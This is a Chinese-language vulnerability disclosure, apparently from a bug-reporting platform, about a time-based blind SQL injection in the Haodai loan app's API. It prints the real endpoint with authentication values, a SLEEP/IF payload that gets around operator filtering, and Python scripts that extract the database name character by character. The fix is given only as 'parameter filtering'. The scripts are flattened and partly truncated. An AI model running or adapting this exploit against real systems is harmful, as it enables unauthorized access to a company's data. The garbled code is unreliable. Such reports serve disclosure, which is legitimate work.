好贷网APP存在SQL注入漏洞
好贷网的“好贷APP”检测了下发现以下url存在时间盲注,注入参数为:auth_did
http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd
用SQLMap发现跑不出来,手工看了下,发现过滤了大小于号……遂写Python程序跑了下:1、跑数据库名长度:
AND SLEEP(IF((SELECT LENGTH(DATABASE())=1,5,0))import requests,timefor i in range(21): url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT%20LENGTH%28DATABASE%28%29%29%29='+str(i)+',5,0%29%29&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd' st = time.time() r = requests.get(url) print 'Length:',i,time.time() - st得到:LENGTH(DATABASE()) = 162、跑数据库名:AND SLEEP(IF(ascii(mid(database(),1,1))=1,5,0))import requests,timedatabase = ''for j in range(16): i = 33 while i url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372 AND SLEEP(IF(ascii(mid(database(),'+str(j+1)+',1))='+str(i)+',10,0))&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd' st = time.time() r = requests.get(url) if time.time() - st > 10: database = database + chr(i) print 'Database_name: ',database break i = i + 1
得到数据库名:interface_hd_com
解决方案:
参数过滤